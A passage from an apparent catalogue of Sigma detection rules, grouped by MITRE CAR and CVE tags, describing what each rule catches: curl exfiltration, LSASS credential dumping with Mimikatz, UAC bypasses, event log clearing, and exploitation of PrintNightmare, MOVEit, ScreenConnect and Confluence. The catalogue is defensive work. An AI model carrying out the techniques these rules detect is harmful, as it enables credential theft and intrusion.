    Description: Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server.
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags, which might indicate potential data exfiltration.
  • Diskshadow Child Process Spawned - Level: medium
    Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
  • Curl.EXE Execution With Custom UserAgent - Level: medium
    Description: Detects execution of curl.exe with custom useragent options
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process - Level: medium
    Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
  • Diskshadow Script Mode Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the system. Investigate the content of the scripts and their location.
  • Potential Proxy Execution Via Explorer.EXE From Shell Process - Level: low
    Description: Detects the creation of a child "explorer.exe" process from a shell-like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be used to hunt for anomalies. The MuddyWater threat actor was seen using this technique.
  • Potential DLL Sideloading Activity Via ExtExport.EXE - Level: medium
    Description: Detects the execution of "Extexport.exe", a utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to sideload any DLL. If a folder is provided in the command line, it will load any DLL with one of the following names: "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags were provided.
  • Potential Password Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
  • New Self Extracting Package Created Via IExpress.EXE - Level: medium
    Description: Detects the "iexpress.exe" utility creating self-extracting packages. Attackers were seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and, in the case of a ".sed" file, check its contents and legitimacy.
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
  • CodePage Modification Via MODE.COM - Level: low
    Description: Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • SMB over QUIC Via Net.EXE - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
  • Suspicious New Instance Of An Office COM Object - Level: medium
    Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
  • Import New Module Via PowerShell CommandLine - Level: low
    Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
  • Unusually Long PowerShell CommandLine - Level: low
    Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Potentially Suspicious PowerShell Child Processes - Level: medium
    Description: Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly - Level: medium
    Description: Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions - Level: medium
    Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of Action1, the administrator must create a new policy or an app to establish remote execution and then target the endpoints where the agent is installed. Hunting Opportunity 1 - Weed Out The Noise: When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0". After establishing a baseline, we can split the command to extract the policy name, group all the policy names and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours: If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
  • Remote Access Tool - Ammy Admin Agent Execution - Level: medium
    Description: Detects the execution of the Ammy Admin RMM agent for remote management.
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer - Level: medium
    Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting - Level: medium
    Description: Detects remote binary or command execution via the ScreenConnect Service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
  • DLL Call by Ordinal Via Rundll32.EXE - Level: medium
    Description: Detects calls of DLL exports by ordinal numbers via rundll32.exe.
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly - Level: medium
    Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
  • Scheduled Task Creation From Potential Suspicious Parent Location - Level: medium
    Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
  • SC.EXE Query Execution - Level: low
    Description: Detects execution of "sc.exe" to query information about registered services on the system
  • Potential CommandLine Obfuscation Using Unicode Characters - Level: medium
    Description: Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Potentially Suspicious Compression Tool Parameters - Level: medium
    Description: Detects potentially suspicious command line arguments of common data compression tools
  • Elevated System Shell Spawned - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
  • EventLog Query Requests By Builtin Utilities - Level: medium
    Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
  • Potential Suspicious Execution From GUID Like Folder Names - Level: low
    Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
  • Execution From Webserver Root Folder - Level: medium
    Description: Detects a program executing from a web server root folder. Use this rule to hunt for potentially interesting activity such as webshells or backdoors.
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
  • File or Folder Permissions Modifications - Level: medium
    Description: Detects a file or folder's permissions being modified or tampered with.
  • Manual Execution of Script Inside of a Compressed File - Level: medium
    Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries. From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native Windows File Explorer capabilities. When the malicious script is double-clicked, it will be extracted to the respective directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter.
  • Process Terminated Via Taskkill - Level: low
    Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
  • Suspicious Tasklist Discovery Command - Level: informational
    Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • System Information Discovery Via Wmic.EXE - Level: low
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands.
  • Cab File Extraction Via Wusa.EXE - Level: medium
    Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract a cab file using the "/extract" argument, which is no longer supported.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Microsoft Office Trusted Location Updated - Level: medium
    Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry value inside "\Shell\Open\Command" with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payloads for defense evasion.
  • Command Executed Via Run Dialog Box - Registry - Level: low
    Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
  • Service Binary in User Controlled Folder - Level: medium
    Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
  • Shell Context Menu Command Tampering - Level: low
    Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
cve.2021_1675 9
Show Rules (9)
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and/or through group policy.
  • Potential PrintNightmare Exploitation Attempt - Level: high
    Description: Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675.
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detects DLL loads from the Spooler Service backup folder.
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • Suspicious Printer Driver Empty Manufacturer - Level: high
    Description: Detects a suspicious printer driver installation with an empty Manufacturer value
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675.
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
car.2013_07_002 9
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • RDP Login from Localhost - Level: high
    Description: RDP login with localhost source address may be a tunnelled login
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln - Level: high
    Description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
  • Potential RDP Exploit CVE-2019-0708 - Level: medium
    Description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
  • Outbound RDP Connections Over Non-Standard Tools - Level: high
    Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
car.2016_03_001 9
  • HackTool - SharpLdapWhoami Execution - Level: high
    Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • Renamed Whoami Execution - Level: critical
    Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
  • WhoAmI as Parameter - Level: high
    Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
  • Enumerate All Information With Whoami.EXE - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/all" flag
  • Whoami Utility Execution - Level: low
    Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
  • Whoami.EXE Execution With Output Option - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
  • Whoami.EXE Execution Anomaly - Level: medium
    Description: Detects the execution of whoami.exe with suspicious parent processes.
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
car.2019_04_001 8
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Potentially Suspicious Event Viewer Child Process - Level: high
    Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
  • HackTool - Empire PowerShell UAC Bypass - Level: critical
    Description: Detects some Empire PowerShell UAC bypass methods
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • UAC Bypass via Event Viewer - Level: high
    Description: Detects UAC bypass method using Windows event viewer
  • UAC Bypass via Sdclt - Level: high
    Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
car.2013_05_009 7
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • Renamed PsExec - Level: high
    Description: Detects the execution of a renamed PsExec often used by attackers or malware
  • Renamed PowerShell - Level: high
    Description: Detects the execution of a renamed PowerShell often used by attackers or malware
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries - Level: high
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
car.2016_04_002 7
  • Security Eventlog Cleared - Level: high
    Description: One of the Windows Eventlogs has been cleared, e.g. caused by "wevtutil cl" command execution
  • Eventlog Cleared - Level: medium
    Description: One of the Windows Eventlogs has been cleared, e.g. caused by "wevtutil cl" command execution
  • Important Windows Eventlog Cleared - Level: high
    Description: Detects the clearing of one of the Windows Core Eventlogs, e.g. caused by "wevtutil cl" command execution
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique was seen being used by threat actors and ransomware strains in order to evade defenses.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
car.2013_09_005 7
  • Suspicious Service Installation - Level: high
    Description: Detects suspicious service installation commands
  • Uncommon Service Installation Image Path - Level: medium
    Description: Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
  • Service Installation in Suspicious Folder - Level: medium
    Description: Detects service installation in suspicious folder appdata
  • Service Installation with Suspicious Folder Pattern - Level: high
    Description: Detects service installation with suspicious folder patterns
  • Suspicious Service Installation Script - Level: high
    Description: Detects suspicious service installation scripts
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Rare Service Installations - Level: low
    Description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
car.2013_08_001 7
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Rare Schtasks Creations - Level: low
    Description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
cve.2023_36884 6
  • Potential CVE-2023-36884 Exploitation Dropped File - Level: medium
    Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation Pattern - Level: critical
    Description: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 URL Request Pattern Traffic - Level: high
    Description: Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - File Downloads - Level: medium
    Description: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - URL Marker - Level: high
    Description: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - Share Access - Level: high
    Description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
car.2019_04_004 5
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
  • Potentially Suspicious AccessMask Requested From LSASS - Level: medium
    Description: Detects process handle on LSASS process with certain access mask
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
cve.2021_34527 4
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detect DLL Load from Spooler Service backup folder
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
cve.2023_23397 4
  • Suspicious WebDav Client Execution Via Rundll32.EXE - Level: high
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to Outlook that indicate that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
  • CVE-2023-23397 Exploitation Attempt - Level: critical
    Description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
  • Potential CVE-2023-23397 Exploitation Attempt - SMB - Level: medium
    Description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
cve.2023_22518 4
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
cve.2023_4966 4
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs by looking for a very long host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs by looking for a very long host header string.
cve.2022_26134 3
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
cve.2021_26084 3
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection
car.2013_07_001 3
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Detects the copying of files with well-known filenames (sensitive files containing credential data)
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
stp.1u 3
  • Operator Bloopers Cobalt Strike Commands - Level: high
    Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
car.2016_03_002 3
  • New Process Created Via Wmic.EXE - Level: medium
    Description: Detects new process creation using WMIC via the "process call create" flag
  • Hardware Model Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
  • Potential Product Class Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
cve.2020_0688 3
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
cve.2023_34362 3
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
cve.2023_36874 3
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location - Level: medium
    Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation - Level: high
    Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution - Level: high
    Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
cve.2024_1709 3
  • ScreenConnect User Database Modification - Level: medium
    Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation - Level: critical
    Description: Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
  • ScreenConnect User Database Modification - Security - Level: medium
    Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log successful Windows Event ID 4663 events and a SACL set on the directory.
cve.2021.21551 2
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Lenovo Driver Load - Level: high
    Description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
cve.2019_14287 2
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
